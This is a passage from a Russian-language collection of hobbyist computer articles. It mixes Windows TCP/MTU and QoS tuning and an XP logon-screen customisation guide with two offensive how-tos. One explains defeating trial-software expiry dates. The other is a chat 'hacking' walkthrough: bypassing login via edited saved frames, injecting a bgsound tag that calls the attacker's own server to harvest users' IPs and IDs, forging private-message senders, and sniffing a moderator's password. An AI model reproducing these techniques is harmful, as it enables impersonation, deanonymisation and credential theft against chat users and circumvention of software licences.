появилась. Так она вообще убилась. Но не всякий любит
это делать. Можно использовать кряки, но их Ты хрен сыщешь (хотя если Ты
постоянный наш посетитель то ты его обязательно
сможешь откопать или сам хакнуть прогу). Поэтому ломать надо более интеллектуально.
Можно использовать TIME MACHINE, EXTRACTOR или STRANGE CRACK. Вот на них то мы
и остановимся по подробнее. Time Machine - это
программы, которые эмулируют для какой-то конкретно
проги другое время. Не такое какое установлено в
системном таймере. Раньше что-то похожее было в DOS'е под названием SetVer.
Только он эмулировал не время а другую версию
операционки. Такие программы очень выгодно использовать, т. к. одну Time
Machine можно использовать для всех без исклю чения
trial-прог, а вмешательства в сам код нет. Т. е. шансы что ты испортишь прогу
равны 0%. Но в то же время прога осается не зарегестрированной, а значит часть функций от Тебя скрывается. Extractor - это
прога для вскрытия некоторых типов защит. Дело в том, что многие программеры не
придумывают свою защиту а используют уже готовую. Так
вот extractor вскрывает некоторые защиты такого типа. Хотя для каждой проги
пишется свой Extractor, он может пригодиться и для других прог с такой же
защитой, правда могут возникнуть глюки. Но большинство
прог используют свою защиту, а с ними Extractor'ы не действуют. Ну а
StrangeCrack - это проги, которые ломают сразу всеми
возможныи методами. Действуют либо 100% либо гробят
программу. Ну и хрен с ней. С программой. Правда глюки
все равно могут быть. Ну а теперь давай попробуем сломать что-нибудь сами.
Вначале давай подумаем где прога может хранить даные о
сроке истекания действия. Правильно - в своих файлах и в системных файлах
Windows (это конечно если Ты пользуешься МастДаем).
Если файлы храняться в ее файле, то можно вначале опробовать посмотреть все
файлы ini, sys, dat и подобные. Лично я всегда просто пускаю поисковик по
тексту. Из примеров прог которых
можно хакнуть таким способом я могу привести пример SciDoctor. Но это не лучший
вариант. Просто циферок таких может оказаться очень много. Если дата хранится в
системных файлах Windows то это уже легче. Системные
файлы Windows - это win.ini, user.dat и system.dat. User.dat и system.dat - это
реестр. Так чтонайти дату в двух местах можно особо не напрягаясь. Для лазанья
по реестру лучше использовать Regedit из 95виндов. Он мне как-то больше
нравится. Ну вот и все. Напоследок хочу только
посоветовать проги RegMon и FileMon. Они отслеживают все изменения в файлах и
реестре. С их помощью найти что Тебе надо будет
гораздо проще. Удачного взлома!
ВЗЛОМ ЧАТА,ВЗЛОМ
ФОРУМА
Предполагается, что читатель знает, что такое CGI, и на этом мы построим своё
объяснение.
В любом чате фрейм, в
котором вы пишете сообщения, генерится динамически (для каждого входящего) и,
возможно, содержит несколько скрытых полей. Типа
<input type=hidden name=cookie value=SP202134> (так хранится UserlD).
Идея в следующем: сохраняем
содержимое этого фрейма на диске и исправляем его так, чтобы можно было с ним работать
со своего винта. Т.е. заменяем ссылки типа /cgi-bin/refresh pi на полный путь
www.chat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем типа
<mput type=text name=cookie value=SP202134> (что бы можно было их
изменять) После этого делаем HTML документ для "сборки чата" из
кусков. Т.е. примерно так:
"First htm"
<html>
<frameset rows="80%, 20%">
<frameset cols="70%,30%">
<frame name="razg" src= "http //www
chat.nsk.su/cgi-bin/refresh cgi?win+razgovor+nocookie#end">
<frame name="right" src="http //www
chat.nsk.su/right.html">
</frameset>
<frame name="bot" src="start.htm">
</frameset>
</html>
Start.htm - это и есть тот фрейм который мы сохранили и изменили.
После этого просто
броузером открываем страницу (First.htm). И сразу(!!!)
попадаем в чат, минуя стандартную процедуру входа.
Это позволит:
1. Обходить
зарегистрированные имена.
2. Прятать свой IP от киллеров, засчет взятия чужого ID'a.
Дальше интересно вычислить
IP участников. Если не запрещён тэг <bgsound src="">, то это
позволит вставлять в своё сообщение ресурс со своей машины. Сам
по себе звук не нужен, но этот косяк позволил вставить в свой месс строку типа
<bgsound src="http://MyIP/cgi-bin/spy.exe">. Этот скрипт
(spy.exe) вызывался с машины каждого участника чата. Это позволит увидеть IP
всех (скрипт просто сохраняет на винт данные из переменной окружения
REMOTE_ADDR). Примерно в это-же время в чате появились
приваты. Это значит, что документ в главном фрейме (тот где мессы все) стал
называться по другому.
До приватов:
http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor#end
После появления приватов:
http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+SP345678#end
Где SP456789 - UserlD
После этого в скрипт
(spy.exe) был добавлен вывод ID'a из переменной окружения HTTP_REFERER. Ну а
сопоставить ник с ID'ом не проблема, т.к. ID каждого прописан там же примерно в
такой строке:
<br><b><font color = yellow
size=-1>Tyт ник
</font></b>
<font color=black><a
href="/cgi-bin/private_form.cgi?SP448188">
<img src=/img/mes.gif border=0 vspace=0> </a> </font>
(Это строка взята из
правого фрейма, где можно вызвать функцию "Кто в чате").
После этого перестало быть
проблемой сопоставление ника и IP. Затем можно позабавиться с приватами.
Используя метод сохранения
странички на винт, можно получить форму для отправления приватов от кого-то
кому-то. Т.е. можно в отсылаемом приватно сообщении проставлять имя
отправителя.
Осталось только одно.
Известно, что в чате есть киллеры, но ничего не
известно про то, что это, где это, как это. Известно только, что для того,
чтобы киллерствовать надо зайти на какую-то страничку. Очевидно, что в этой
киллерской страничке показываются имена. Предположим, что имя показывается
таким, каким его вводить. Исходя из этого, под именем <bgsound
src="http://MyIP/cgi-bin/spy.exe"> MyNick зашел в чат (через
прокси), и начал легонько ругаться (надо было, чтобы киллеры
зашли на свою страничку). После этого, изучив лог нашего ВебСервера (OmniHTTPd
beta), можно увидеть там обращение со страницы, не относящейся к известным нам
страницам чата. Лезем на эту страницу и получаем запрос на ввод пароля, со
словами "Дорогой администратор...". Это приятно греет душу. Дальше
можно подобрать пароль или ещё что придумать. Но ситуация сложилась гак, что мы
оказались в одной сети с киллером, и, запустив сниффер, мы получаем пароль.
"Оптимизация интернет-соединения" |
Освобождение канала
(bandwidth), зарезервированного за сервисом QoS
Это такая хитрющая штука, о которой я бы вжись не догадался, если бы не прочитал
на сайте улучшалок ХР. Как оказалось, Windows XP по умолчанию выделяет часть
Интернет-канала для очень полезной штуки, которая называется Quality of Service
(QoS). Назначение QoS - улучшать распределение трафика программ, написанных с
учетом QoS API. Другое дело, что этих программ днем с огнем не сыскать (вернее, у меня лично они не стоят), поэтому
резервирование канала под ненужный сервис - непозволительная роскошь. Вот что
нужно проделать для того, чтобы освободить и без того узкий канал отечественного
соединения с Интернетом: В меню Start - Run запустите редактор групповых
полисов: gpedit.msc. Имейте ввиду, что для выполнения всех этих процедур вам необходимо войти в
систему как Администратор. В разделе Computer
Configuration (в левом окне) выберите Administrative Templates. Далее Network и затем в правой панели выберите
QoS Packet Scheduler и кликните на нем два раза. Выберите опцию limit
reservable bandwidth и опять-таки кликните на ней два раза. В открывшемся окне
включите Enabled, а затем укажите лимит канала в процентах равный нулю. ОК и
выйдите из программы. Но это еще не все.
Отправляйтесь в сетевую конфигурацию (иконка Network Connections в Контрольной
панели). Выделите свое соединение и из контекстного меню запустите Properties
В закладке Networking убедитесь, что протокол QoS Packet Scheduler
подключен (enabled). Если его там нет, то добавьте из списка (через кнопку
Install). Перегрузите компьютер.
Все эти сложные пассы с насильственным включением сервиса и последующим
выделением под него нулевого канала вызваны тем, что если просто отключить
Quality of Service, то, как это часто бывает у наших
антипятов, система все равно будет резервировать под него 20 % канала.
Отключение заданий по
расписанию (scheduled tasks)
Всякий раз, как MSIE 6.0 соединяется с сервером, он тратит время на проверку
наличия заданий по расписанию, связанных с данным адресом. Поскольку я никогда
не пользовался и не планирую пользоваться функцией синхронизации Проводника, то
я отключил планировщик заданий:
В реестре нужно удалить следующий ключ -
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ explorer
\ RemoteComputer \ NameSpace \ {D6277990-4C6A-11CF-8D87-00AA0060F5BF}.
Оптимизация
соединения Windows 98 и Millenium:
Пока цивилизованный мир вовсю осваивает Интернет, используя широкополосный
доступ посредством выделенных линий, всевозможных кабельных модемов, ISDN, ADSL
и прочих недоступных нашему пользователю прибамбасов,
мы с вами довольствуемся дешевой и доступной (пока не ввели повременку)
модемной связью, не забывая периодически ругать ее за плохое качество и низкую
скорость передачи данных. Однако грамотным пользователям достаточно хорошо
известно, что иногда удается заметно ускорить свою работу с Интернетом, если
удачно настроить некоторые слабо документированные параметры операционной
системы Windows 9x. То, что при настройке соединения с Интернет-провайдером
надо первым же делом выставить параметры протокола TCP/IP, стало уже догмой и
многие даже не задумываются, насколько общепринятые настройки подходят именно
для их конкретного соединения. Тем более что при этом совершенно не нужно
обладать какими-то особыми знаниями - программ, предназначенных для
автоматического внесения в реестр Windows всех необходимых изменений настолько
много, что создается впечатление, будто все начинающие программисты набираются
опыта именно на "ускорителях Интернета". А между тем, слепо изменяя
установленные в Windows по умолчанию значения на среднестатистические, следуя
советам, почерпнутым из порой сомнительных источников, вы можете с равной
вероятностью как улучшить скорость прокачки файлов, так и ухудшить ее. Tочно так же, оставив в покое настройки ОС, вы в ряде
случаев будете зря терять время и деньги, не используя по максимуму свой
Интернет-доступ. Что же это за таинственные параметры
и каким образом следует выбирать наиболее оптимальные
в каждом конкретном случае значения?
MTU
Первым делом, конечно же, надо разобраться с давно навязшим в зубах
параметром MTU - Maximum Transmission Unit. В реестре он задается таким образом:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\Class\NetTrans\000х
"MaxMTU"="1500"
Это максимальный размер пакета данных, который
может быть передан за один физический кадр по протоколу TCP/IP. Дело в том, что
данные от компьютера к компьютеру в Интернете идут не сплошным потоком, а этими
самыми кадрами - пакетами строго определенного размера. Если бы все компании и
фирмы, имеющие хоть какое-то отношение к Интернету, договорились о едином
стандарте на размер этих пакетов, то мы бы использовали каждый такой кадр по
максимуму, полностью заполняя каналы передачи данных своими битами. Однако это
не так. Мало того, что при установке нового соединения два удаленных компьютера
должны согласовать между собой размер кадра, так еще и по пути к месту
назначения пакет преодолевает целый ряд промежуточных серверов и
маршрутизаторов, настройки MTU которых могут быть совершенно
различными. При этом слишком большой пакет в пути, скорее всего, будет
фрагментироваться и заполняться "воздухом", "балластом",
что негативно скажется на эффективности связи. Так, если ваш провайдер имеет
установки MTU=576, а у вас в Windows задано MTU=1500, то каждый ваш пакет будет
им разбиваться на три по 576 байт: 576+576+576=1728 - то есть 228 байт балласта
будут добавляться к каждому вашему пакету. Но даже если провайдер тоже поставил
у себя MTU=1500, то при связи с удаленным сервером вполне может
попасться маршрутизатор с меньшим значением MTU и пакеты опять-таки
будут фрагментироваться, замедляя передачу данных. Несколько спасает
ситуацию включенная в "виндах" по умолчанию функция
автоматического определения MTU - "PMTU Discovery" или, как ее иногда
называют, "MTU Auto Discovery", однако процедура вычисления MTU для
каждого соединения требует немало времени, что чуть тормозит работу при
прокачке небольших файлов и веб-серфинге. Да и в случае несогласования ваших
параметров с параметрами провайдера эта функция вряд ли вам поможет. Конечно,
существуют некие более или менее общепринятые стандарты для данного параметра:
так, например, для Ethernet MTU равен 1500 байт, для SLIP - 1006, для PPPoE
-1492, для PPP (то есть модемной связи с Интернетом) - 576. Но на деле ваш провайдер может выбрать отличное от этих значений число,
исходя из каких-то своих соображений. Мы же в результате либо не загружаем свой
канал связи полностью, отправляя кадры меньшего размера, чем это позволяет
провайдер и часто посещаемые серверы, либо наоборот, наши установки превышают
необходимое значение и большие пакеты идут фрагментированными, что еще более
снижает возможности линии связи. Каждый такой пакет данных в действительности
состоит из нескольких сегментов - нескольких заголовков и фактических данных.
Та его часть, в которой содержатся только фактические данные, называется MSS
(Maximum Segment Size) - это еще один параметр протокола TCP, определяющий
самый большой сегмент данных TCP, которые могут быть переданы за один раз. То
есть, MTU = MSS + заголовки TCP/IP. В реестре MSS задается так:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\VxD\MSTCP
"DefaultMSS"="ваше число"
Для заголовка тоже имеется общепринятый размер -
это 40 байт (20 байт IP и 20 байт TCP), следовательно, обычно MSS = MTU - 40.
По этой причине в определении оптимального размера MTU есть некоторые тонкости.
Давайте изучим передачу данных при разном размере MTU по широкополосной линии
T1 (пропускная способность - 1 544 000 бит/с), используя следующую формулу:
[(MSS + заголовок) * 8 бит/байт] / [1 544 000 бит/с] =
задержка на один хоп (то есть на каждый компьютер в
Сети по пути нашего пакета). Используя в этой формуле разные величины MTU, мы
можем вычислить задержку одного пакета. Если MTU=1500, тогда задержка = (1460 +
40) * 8 / 1 544 000 = 7,772 мс. Если же MTU=576, то задержка = (536 + 40) * 8 /
1 544 000 = 2,984 мс. Предположим, что по пути пакета встречается 10 серверов,
тогда при MTU=1500 получим задержку 77,72 мс, а при MTU=576 - 29,84 мс -
разница весьма заметна. Таким образом, очевидно, что меньшие пакеты будут
переданы быстрее просто из-за ограничения производительности линии. Однако не
все так просто.
Используя ту же формулу, давайте посчитаем, за какой промежуток времени будет
передан файл размером 1 Мбайт по той же широкополосной линии T1. Один мегабайт
равен 1024 кбайт или 1 048 576 байт. Если MTU=1500, то, как мы выяснили,
задержка на один хоп составит 7,772 мс. Сколько при этом понадобится послать
пакетов? 1 МБ / MSS = 1 048 576 / 1460 = 718,2, то есть всего требуется 719
эффективных пакетов, чтобы передать 1 мегабайт данных. Далее, умножаем 719
пакетов на 7,772 мс, получаем 5588,083 мс, или 5,588 секунд задержки на один
хоп. Если же мы передаем свой файл через 10 хопов, что встречается чаще, чем
один, то получаем 55,88 сек. - это время, которое мы (вернее, провайдер,
имеющий линию T1) потратим на передачу файла в 1 МБ при идеальной связи. Если
же MTU=576, то: 1 МБ / MSS = 1 048 576 / 536 = 1956,300, то есть при таком MTU
нужно 1957 пакетов, чтобы передать 1 мегабайт. Далее, умножаем количество
пакетов на задержку каждого из них: 1957 * 2,984 = 5840,580 мс, или 5,841
секунды на один хоп. Ну и соответственно на 10 хопов придется
58,41 сек. Как видим, из-за того, что при использовании больших пакетов
передается меньше заголовков, реальная скорость передачи файла получается выше.
Для того чтобы передать 1 мегабайт при использовании MTU = 1500 нужно переслать
"довесок" заголовков из 28 760 байт, тогда как при использовании
MTU=576 получаем аж 1957 * 40 = 78 280 байт, то есть
дополнительные 49 520 байт заголовков на каждый мегабайт полезной информации.
Для нашей 10-хоповой передачи это выливается в лишних
2,52 секунды при передаче каждого мегабайта даже при сверхбыстрой связи. Эта
разница, возможно, будет еще немного выше на практике, так как современные
реализации TCP/IP стремятся использовать еще большие заголовки (например,
дополнительные 12 байтов заголовка для отметок времени). Если же провести
аналогичные расчеты для связи по модему на скорости
33 600 кбит/с, то получим, что на передачу мегабайта информации на расстояние
одного хопа, то есть непосредственно вашему провайдеру, будет потрачено в
идеале 256 секунд при MTU=1500 и 268 секунд при MTU=576. Разница на одном
переходе 12 секунд или около 4,5%! Но не следует забывать, что эти цифры
получатся при условии отсутствия фрагментации пакетов, то есть если у вашего провайдера MTU=1500. Если же это
не так, то, разумеется, больший, чем нужно, пакет будет фрагментироваться -
разбиваться на несколько пакетов и даже разбавляться "воздухом", и
связь ухудшится на 10-50%. Таким образом, логично считать, что большие пакеты в
итоге все-таки предпочтительнее, и если ваш провайдер настроил свои серверы и
маршрутизаторы на большие пакеты, то надо стремиться использовать это на всю
катушку, но не забывать и о том, что в Интернете встречаются серверы с
MTU=576 (об этом чуть ниже мы еще поговорим). Тем не менее, если чистая
производительность не является окончательной целью, то меньшие пакеты будут
более "быстрыми", поскольку они требуют меньше времени для своих
путешествий по Сети. Этот эффект может перевешивать все другие достоинства
больших пакетов в некоторых Интернет-приложениях и онлайновых играх за счет
уменьшения времени отклика удаленного сервера при передаче небольших объемов
информации. В Интернете по пути следования ваших пакетов, вероятно, встретятся
самые разные серверы с самыми разными настройками, но для начала все-таки
желательно определить наилучшее значение MTU при связи только с вашим
провайдером, поскольку именно оно может оказать решающее значение при
оптимизации вашего доступа в Сеть.В Windows 95
разработчиками по умолчанию было выбрано MTU=1500, что якобы не соответствует
оптимальному для модемного соединения значению, которое всеми считается равным
576. В Windows 98 корпорация Microsoft уже исправила этот недостаток, и теперь
по умолчанию при соединениях ниже 128 килобит в секунду мы имеем MTU=576, что
вроде бы должно чаще оказываться наилучшим вариантом. Попробуем разобраться,
так ли оно на самом деле.
Итак, есть несколько способов определить значение MTU, оптимальное для связи с вашим Интернет-провайдером.
1. Послать письмо с вопросом в службу технической поддержки провайдера. Тут в
принципе все понятно - если работники провайдера сами в курсе своих собственных
настроек, то они дадут вам квалифицированный ответ, который, впрочем, не
помешает все-таки и проверить самолично на практике.
2. Подключиться к Интернету в терминальном режиме - иногда при осуществлении
регистрации пользователя в одной из строк появляется рекомендуемое значение
MTU. Для этого войдите в папку "Удаленный доступ", найдите там значок
своего соединения и, щелкнув по нему правой кнопкой мыши, выберите пункт
"Свойства". На странице "Общие" открывшегося меню жмите
кнопку "Настроить" возле строки с названием вашего модема и в диалоге
свойств модема переходите на вкладку "Дополнительно", где установите
флажок "Выводить окно терминала после соединения". Теперь
соединяйтесь с провайдером и при появлении окна терминала вводите вручную имя
пользователя и пароль по соответствующим запросам. Если после этого вы увидите
что-то типа "Entering PPP mode. Your IP address is ххх.ххх.ххх.ххх.
MaxMTU is 1524", то вам повезло - вы получили MTU провайдера. Но и тут
нелишним будет проверить это значение лично. 3. И, наконец, ручное определение
MTU.
Определение MTU вручную
Для адекватных результатов экспериментов обязательно необходимо
выставить в операционной системе максимальный размер MTU=1500. Поэтому, если вы
уже пытались изменять этот параметр с помощью какой-то программы или вручную в
реестре, то обязательно отмените все внесенные изменения, вернув default-настройки.
В этом вам помогут утилиты Internet Tweak 2001 (http://www.magellass.com/),
NetBoost 99 (http://www.download.ru/),
iSpeed (http://www.hms.com/),
MTUSpeed (http://www.mjs.u-net.com/),
BlazeNET (http://www.indeavour.com/html_about_blazenet.htm) - выбирайте
по вкусу. В реестре же вам придется проконтролировать это в разделе:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\Class\NetTrans\000х
Если найдете там параметр MaxMTU, то смело удаляйте его. Далее, открываем "Панель управления" (Control Panel) - "Сеть" (Network), выбираем "Контроллер удаленного доступа" (Dial-Up Adapter) и жмем кнопку "Свойства" (Properties). На вкладке "Дополнительно" (Advanced) появившегося меню устанавливаем большой размера IP-пакета ("IP Packet Size" - "Large"). Тем самым мы установили для нашего соединения MTU=1500. Перегружаем компьютер, чтобы изменения вступили в силу. Теперь надо установить соединение с Интернетом и посмотреть, будут ли фрагментироваться пакеты различного размера. Для этого можно использовать и стандартную программу Ping из комплекта Windows, задавая ей такие параметры: ping -f -l 1500 ххх.ххх.ххх.ххх, где "ххх.ххх.ххх.ххх" - IP-адрес тестируемого сервера, а "-I" - это буква L, а не единица. Но гораздо удобнее применять что-нибудь типа утилит CyberKit (http://www.cyberkit.net/
или IPTools (http://www.ks-soft.net/ip-tools.eng/index.htm
) - в них есть приятный графический интерфейс
вместо анахронизма командной строки Ping. Определяем сначала этой же
многофункциональной программой IP-адрес одного из серверов вашего провайдера,
тем самым мы избежим запросов к DNS-серверу во время тестирования. Примените
для этого вкладку "TraceRoute", введя в поле адреса URL провайдера.
Теперь полученный IP вводим на странице "Ping", задаем для начала
размер пакета 1500 и ставим флажок "Don't fragment" - "Не
фрагментировать". В поле, где задается количество тестовых пакетов ставьте штук 5-6 - для того чтобы исключить
случайные ошибки. Кстати, тест лучше проводить глубокой ночью, когда на линиях
сидит мало народа и помех в телефонных сетях минимум. Если никакого ответа не
получено и наш пакет потерян, так как фрагментировать мы его запретили, а его
размер слишком велик для настроек оборудования провайдера, то начинаем
постепенно уменьшать величину пакета до тех пор, пока не станем получать
отклики от сервера со значением этого самого "пинга". Так, например,
для провайдера CEA мы получим размер неделимого пакета в 1472 байта. Означает
ли это, что он использует MTU=1472? Нет, у него MTU=1500, просто Ping
прибавляет к нашим данным заголовок, который по-разному учитывается удаленными
серверами, например, CEA не принимает во внимание заголовок IP (20 байтов) и
ICMP (8 байтов) при отчете о своем MTU. Если же вам не
повезло, и ваш провайдер выбрал меньшее значение, то ищите его среди таких чаще
всего попадающихся цифр (также не забывая и о
заголовке пакета): 1524, 1152, 1024, 1006, 576, 568, 560, 552, 548, 536, 528,
520, 512. Таким образом, мы выяснили, что можно выбирать любой MTU, вплоть до
1500. Попробуйте теперь осуществить загрузку одного и того же ZIP-файла
размером 1 мегабайт с одного и того же быстрого сервера при разных значениях
MTU - максимальном, полученном от провайдера, и рекомендуемом 576. Для чистоты
эксперимента отключите автоопределение MTU - параметр PMTU Discovery (о том,
как его найти в реестре, читайте в конце статьи). Скорее всего, вы обнаружите, что
наши расчеты, говорящие о предпочтительности больших пакетов, справедливы.
Проведите и такой эксперимент: "пингуйте" наибольшим
нефрагментируемым пакетом (в нашем случае это 1472, то бишь
MTU=1500) сайты, занесенные в список закладок. Вас ждет удивительное открытие -
оказывается, большинство сайтов прекрасно воспринимают MTU=1500 и все пакеты до
них доходят нефрагментированными. Где же тот самый MTU=576, который якобы
преобладает в Интернете? Проверьте также и свою любимую сетевую игру при разных MTU. Исходя из полученных данных, а не из того, что
вам советуют всевозможные "эксперты", сами никогда не проделывавшие
подобных опытов, а повторяющие только то, что принято за истину на загнивающем
Западе, вы уже гораздо более объективно определите, какое же значение наилучшим
образом согласуется с вашим Интернет-доступом -
наибольшее или меньшее. Действительно, на качество и скорость работы в Сети
сильное влияние оказывает фрагментация пакетов, которая происходит, если
большой пакет проходит через сеть, имеющую MTU меньше, чем длина вашего пакета.
Можно, конечно, перестраховаться и выбрать самый минимальный размер MTU, при
котором пакеты наверняка не будут фрагментироваться, но это может сказаться на
быстродействии вашей системы еще более пагубно, чем использование больших
пакетов. На самом же деле, главное - чтобы ваш MTU не превосходил MTU
провайдера, при включенной же функции PMTU система сама найдет для ваших
пакетов такой путь в Сети, при котором они не будут фрагментироваться. Кстати,
если вы обнаружите, что у провайдера установлено MTU=512 и менее, то есть смысл
подумать о его смене - слишком много шлака будет передаваться вместе с вашими
данными.
Другие параметры
Не только от одного MTU зависит качество вашей работы в Интернете,
существует немало и других параметров протокола TCP, с которыми стоит
поэкспериментировать. Конечно, есть уже некоторые готовые рекомендации и в этом
случае, но, бездумно им доверяя, вы имеете шанс
получить совсем не тот результат, к которому стремитесь. Поэтому и тут крайне
желательно для каждого параметра провести свой эксперимент, определяя, какой
эффект вызывает его изменение в вашей конкретной системе. Многие из этих
параметров легко выставляются с помощью все тех же незамысловатых утилит, что и
MTU.
RWIN (receive window, окно приема)
- размер буфера, в котором накапливается содержимое области данных (MSS)
нескольких полученных пакетов, прежде чем передается дальше, например, в
браузер. При недостаточном размере этого буфера иногда происходит его переполнение и поступающие пакеты отвергаются и теряются.
Размер RWIN обязательно должен быть кратен MSS и обычно для лучшей
эффективности модемного соединения кратность рекомендуется устанавливать равной
4-8. Однако чрезмерно большой размер буфера также нежелателен, особенно на
плохих линиях - при потере всего одного пакета в случае сбоя на линии будет
повторно затребован не один потерянный пакет, а все пакеты из этого буфера, что
займет некоторое время. В реестре этот параметр находится здесь:
HKEY_LOCAL_MACHINE\System\CurrentControl
Set\Services\VxD\MSTCP
"DefaultRcvWindow"="ваше значение"
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP
"DefaultTTL"="64"
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP
"PMTUDiscovery"="0"
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP
"PMTUBlackHoleDetect"="0"
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP
"SessionKeepAlive"="600"
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\
Class\Net\000х
"SLOWNET"=hex:00
HKEY_LOCAL_MACHINE\System\CurrentControlSet
\Services\VxD\NWLink\Ndi\params\cachesize
@="16"
Бесплатный интернет с помощью
программы DialJelly v.1.10 здесь
Подробнее о pop3 smtp протоколах можно почитать тут: http://tehnofil.ru/?id=34.
Пожалуй из часто
встречающихся - не больше 10.
Windows XP
входит в нашу жизнь, не смотря на все наше сопротивление. Только-только
привыкли к ставшей более-менее стабильной Win2000, как
на тебе - WinXP поражает своей красотой (и немерянными системными
требованиями). Ну что ж делать. Приходится осваивать. А раз уж есть возможность сделать свою операционную систему красивее чем
есть или просто не похожей на другие, то почему бы этого не сделать? В
частности сегодня попробуем поговорить о том, как создать собственный экран
входа в систему (Logon User Interface).
Сразу прошу
запомнить, что я не собираюсь отвечать на дальнейшие вопросы по этой теме.
Воспринимайте написанное как есть. Это не учебник и не руководство к действиям,
а лишь попытка поделиться личным опытом. Спасибо. И еще одну вещь хочу
заметить: в этой статье затрагиваются элементы работы с графическими
изображениями. Заметьте, что я привык использовать Photoshop и любые ссылка на графическое ПО приводятся в терминах Photoshop. Хотя вы можете
использовать те программы с которыми больше привыкли
работать. Я был обязан все это сказать. А теперь, давайте приступим.
Перед тем,
как начать что-либо создавать необходимо подобрать
инструменты для работы. В нашем случае вам прежде
всего понадобится компилятор/декомпилятор ресурсов, называемый ResHack.
Для тех, кто
уже успел испугаться названия, скажу, что программа эта крайне проста в
использовании и специальных навыков абсолютно не требует. Текущую версию
ResHack вы всегда можете скачать тут. После того, как вы ее установили,
вам надо выбрать редактор графических изображений. Вы ведь все же создаете
графический интерфейс, не так ли? Надеюсь, что-то в этом роде у вас уже есть. В
самом крайнем случае вы можете использовать и MS Paint…
Но я этого вам не говорил :-). Было бы неплохо. Если у вас на компьютере
нашлось что-то вроде Paint Shop Pro или Adobe Photoshop. Ну и
наконец, вам совсем неплохо бы иметь программу XPLogon UI,
которая позволяет переключать UI без всяких проблем. Если вы все.
Что нужно скачали и установили, то мы можем переходить непосредственно к
созданию нового интерфейса.
Перед тем как
начать работу, наверняка стоит немного времени потратить на размышления. Хуже
от этого не станет совершенно точно. Я не собираюсь сейчас вдаваться в теорию
цветов, но постарайтесь все же держать в голове простую мысль, что вы создаете
интерфейс, а не свершенное по красоте художественное полотно, где найдется
место 4 миллионам цветов. Будьте проще, и пользователи к вам
потянутся :-). А дальше, хозяин - барин, творите, кто во что горазд.
Прежде всего вам должно бы захотеть создать отдельную папку для
хранения всего, что вы сейчас будете создавать. Открываем наш графический
редактор. Прямо сейчас начинаем создавать одну картинку - фон (самая простая
часть). Убедитесь, что начальный размер создаваемого вами изображения
соответствует разрешению на вашем мониторе - другими словами, если у вас
установлено разрешение 1280 x 1024, то сделайте картинку размером 1280 x 1024.
Теперь просто делайте фон таким, каким вам хотелось бы его видеть. Определите
места, где должны располагаться кнопки и иконки входа в систему. Пока рисовать
их не надо, это будет сделано позже.
После того,
как с изображением фона закончено, сохраните его в родном для вашего редактора
формате - для пользователей Photoshop это будет PSD-файл. Теперь вам надо
отредактировать/создать ряд других изображений для того, чтобы экран входа в
систему функционировал как должно. Но где взять шаблоны для этих изображений?
Внутри файла logonui.exe, конечно! Если только мы сможем эти изображения
из него вытащить …
Теперь
настало время узнать немного про ResHack. Но перво-наперво
найдите, где на вашем компьютере находится то, что вы собираетесь менять. Найдите файл logonui.exe (обычно он находится в C:\WINNT\Resources),
и скопируйте его в папку, где вы собираетесь держать все, относящее
ся к новому проекту. Теперь запускайте ResHack. Находясь в программе открывайте меню File > Open и выбирайте
копию файла logonui.exe, которую вы сделали. Открыв его, вы увидите
дерево папок ресурсов слева и пустое поле справа.
Дерево
содержит
папки UIFILE, Bitmap, String Table и Version Info. Держать все это в
голове совершенно ни к чему. Прямо сейчас нас интересуют только графические изображения… и найти их мы сможем в папке Bitmap, как уже
могли предположить те, кто знает английский.
Раскрывая
папку Bitmap, вы обнаружите ряд вложенных в нее папок, пронумерованных от 100
до 127. Каждая такая папка содержит одно изображение, относящееся к
графическому интерфейсу экрана входа в систему. Многие из этих папок содержат
картиночки, являющиеся самыми незначительными деталям интерфейса, но так как я
человек добрый, можно даже сказать, щедрый, то расскажу обо всех, о каких
только знаю, прямо сейчас:
100 - фоновая картинка
102 - поле ввода пароля
103 - кнопка со стрелкой
104 - активная кнопка со стрелкой
105 - кнопка помощи
106 - активная кнопка помощи
107 - кнопка питания
108 - стрелка вверх
109 - стрелка прокрутки вниз
110 - стрелка прокрутки вверх
111 - полоса прокрутки
112 - поле выбранного пользователя
113 - квадрат иконки
114 - иконка по-умолчанию
119 - активный квадрат иконки
121 - активная кнопка питания
122 - активная стрелка вверх
123 - ?
124 - вертикальная линия
125 - линия по верху экрана
126 - линия по низу экрана
127 - ?
Вот так…
давайте сделаем что-нибудь прямо сейчас. Кликните на папку 112; затем в меню
выберите "Action" - "Save [Bitmap :
112]". Появится окно, где вам будет предложено сохранить выбранное
изображение в формате BMP. Сохраните его как "112.bmp" в вашей
рабочей папке и переключайтесь в Photoshop. Открывайте "112.bmp",
рассмотрите его, внесите какие хотите изменения (если с фантазией туговато,
измените хотя бы цвет), затем сохраните. Переключитесь обратно в ResHack и
пвторите эту процедуру со всеми изображениями, которые вы хотите изменить.
Главное не перепутайте номера, что бы потом можно было без проблем поставить
переделанные вами картинки на их родные места. Затем вы выбираете в меню
"Action" - "Replace Bitmap…" вот в таком окне:
получаете
возможность заменить любое изображение внутри logonui.exe на то, которое
вы отредактировали.
А теперь мы
перейдем к достаточно сложной части, чем-то похожей на программирование. Но не
пугайтесь, это только на первый взгляд все выглядит запутанно и непонятно. Я
уверяю вас, что вы справитесь, может даже лучше, чем я сам. Итак, опять смотрим
ResHack и открываем папку в logonui.exe названную "UIFILE". В
ней находим папку "1000", а в ней ресурс названный "1033".
На первый
взгляд кажется, что он пустой, но если прокрутить его примерно на 1/2 вниз, то
вы увидите начало некоего кода - этот код и управляет экраном входа в систему.
Каждый тег "style" описывает объект дизайна, какого цвета тот должен
быть и где располагаться. В начале каждого тега присутствует код
"resid=", и то, что следует за знаком равенства
описывает определяемый объект. Первый объект "frames" - это
основной фон. Если вы внимательно будете смотреть на
последующий код, то увидите, что в этом теге дальше определяется кнопка (button),
